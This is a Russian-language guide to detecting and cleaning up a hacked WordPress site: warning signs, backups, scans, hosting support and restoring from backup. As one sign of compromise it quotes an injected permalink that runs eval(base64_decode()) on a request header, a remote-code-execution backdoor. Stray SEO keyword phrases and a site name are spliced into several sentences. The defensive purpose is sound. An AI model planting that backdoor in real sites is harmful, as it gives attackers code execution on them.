Что делать, если сайт взломали
Все, что подключено к интернету, можно взломать, в том числе и Вордпресс. Чтобы не принять необычное поведение сайта за взлом, проверьте, что вы видите один или несколько из этих признаков:
- Предупреждение в браузере — Хром и другие браузеры предупреждают посетителей о фишинге, вредоносном коде, подозрительной перелинковке и других опасных вещах на сайте. Если вы или ваши посетители видят такое предупреждение, это может говорить о взломе сайта.
- Плагин безопасности показывает предупреждение — если у вас установлен какой-нибудь плагин безопасности, он может показывать предупреждение.
- Постоянные ссылки — Зайдите в Настройки — Постоянные ссылки. Проверьте, что ничего не добавлено к постоянной ссылке. Постоянная ссылка должна выглядеть как
%postname%
. Если ссылка изменилась на%postname%/%
, например,
%postname%/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/
значит, ваш сайт взломали. - Ваш сайт перенаправляет посетителей на другие сайты — хакеры часто используют взломанные сайты для редиректа на свои сайты с часами, сумками, другими товарами или услугами. Если сайт перенаправляет вас на другой сайт, или ваши посетители говорят вам об этом, это определенно взлом сайта.
Проверьте свой сайт в поисках, нет ли в выдаче «виагры» вместе с вашим сайтом.
site:ваш-сайт.ru
Заменитеваш-сайт.ru
на ваш адрес. - На сайте появился непонятный контент взломали сайт что делать — если вы видите, что на сайте появилось что-то новое, чего вы не публиковали, скорее всего это добавили хакеры.
- Пользователи сайта — Проверьте пользователей сайта, нет ли неизвестных вам юзеров с правами администратора.
- Неожиданные пики посещаемости — Хакеры используют взломанные сайты для редиректа на свои сайты. Если вы видите внезапное необъяснимое увеличение посещаемости, это может говорить о перенаправлении спам-трафика через ваш сайт на сайты хакеров.
- Таблицы в базе данных — Хакеры могут получить доступ к базе данных и создать новую таблицу с вредоносным кодом, которая может быть похожа на стандартную таблицу Вордпресс. Например, создать новую таблицу
wp_pagemeta
, которая маскируется под стандартную таблицуwp_postmeta
. - Сканирование сайта показывает проблемы — Часто заражения хорошо скрыты и их нелегко обнаружить. Проверьте сайт на Sucuri Site Check, Virus Total или 2ip чтобы избавиться от сомнений и, возможно, установить место взлома.
- Поисковики пометили ваш сайт как небезопасный — Гугл, Яндекс и другие поисковики могут пометить ваш сайт в результатах выдачи как небезопасный сервис проверки сайта на вирусы, или вообще удалить сайт из поисковой выдачи. В Инструментах Вебмастера Гугл может появиться предупреждение в Проблемах Безопасности.
- Вы не можете попасть в админку Вордпресс — если вы не можете попасть в консоль Вордпресс, скорее всего, ваш сайт взломали.
- Хостинг отключил ваш сайт — Некоторые хостинги могут отключить или удалить взломанный сайт, если вы им об этом скажете или если они сами это обнаружат. На хороших хостингах все сайты изолированы, чтобы не допустить заражения соседних сайтов. Обычно такой хостинг предупреждает владельца сайта о проблеме.
Если вы видите один или несколько из этих признаков и просканировали сайт в Sucuri Site Check, Virus Total и 2ip, которые что-то нашли, значит, ваш сайт действительно взломан.
Читайте далее подробную инструкцию по лечению Вордпресс сайта.
2. Сделайте бэкап
Может показаться странным делать бэкап взломанного сайта, но это нужно сделать. В нем содержится вся информация сайта, не только взломанные файлы.
Кроме этого, хостинг может удалить ваш сайт. Если хостинг заблокирует или удалит ваш сайт, у вас останется копия.
Сделайте бэкап и пометьте его как взломанный.
3. Просканируйте компьютер
В некоторых случаях хакеры попадают на сайт через компьютер пользователя. Если хакер взломал ваш компьютер, он мог пойти дальше и взломать сайт (например, через кейлоггер).
Установите антивирус / файрвол или проверьте компьютер на вирусы и установите все последние обновления ОС. Даже если хакер взломал ваш сайт не через ваш компьютер, сделайте скан, чтобы повторно не заразить сайт после восстановления.
4. Обратитесь к профессионалам
Если вы думаете, что не справитесь самостоятельно, отправьте зараженные файлы профессионалам, например, Virusdie. Они берут небольшую плату за анализ и очистку каждого файла, который сканеры пометили как «Неизлечимый».
Хакеры довольно умные люди, и могут оставить какие-то закладки, чтобы попасть на сайт еще раз после восстановления. Возможно, обращение к профессионалам удалит все закладки и сэкономит время.
Если вы хотите все сделать самостоятельно, читайте дальше.
5. Поговорите с техподдержкой хостинга
Хороший хостинг подготовлен к таким ситуациям и может помочь вылечить сайт. Когда хостинг определяет, что сайт взломан, специалисты техподдержки могут помочь его восстановить.
Хостингу может быть интересно, что случилось с вашим сайтом, потому что это может затронуть другие сайты, которые находятся на этом сервере, и может относиться к общей безопасности хостинга.
Если они не могут помочь, они могут дать направление поиска для восстановления сайта.
6. Восстановите сайт из бэкапа
У вас должен быть настроен бэкап, поэтому попробуйте восстановить сайт из более ранних версий.
Проблема может быть в том, что после последнего бэкапа вы добавляли какую-то информацию на сайт avirlab.com, которая потеряется при восстановлении. Если после восстановления вы теряете слишком много, можно попробовать вылечить сайт вручную.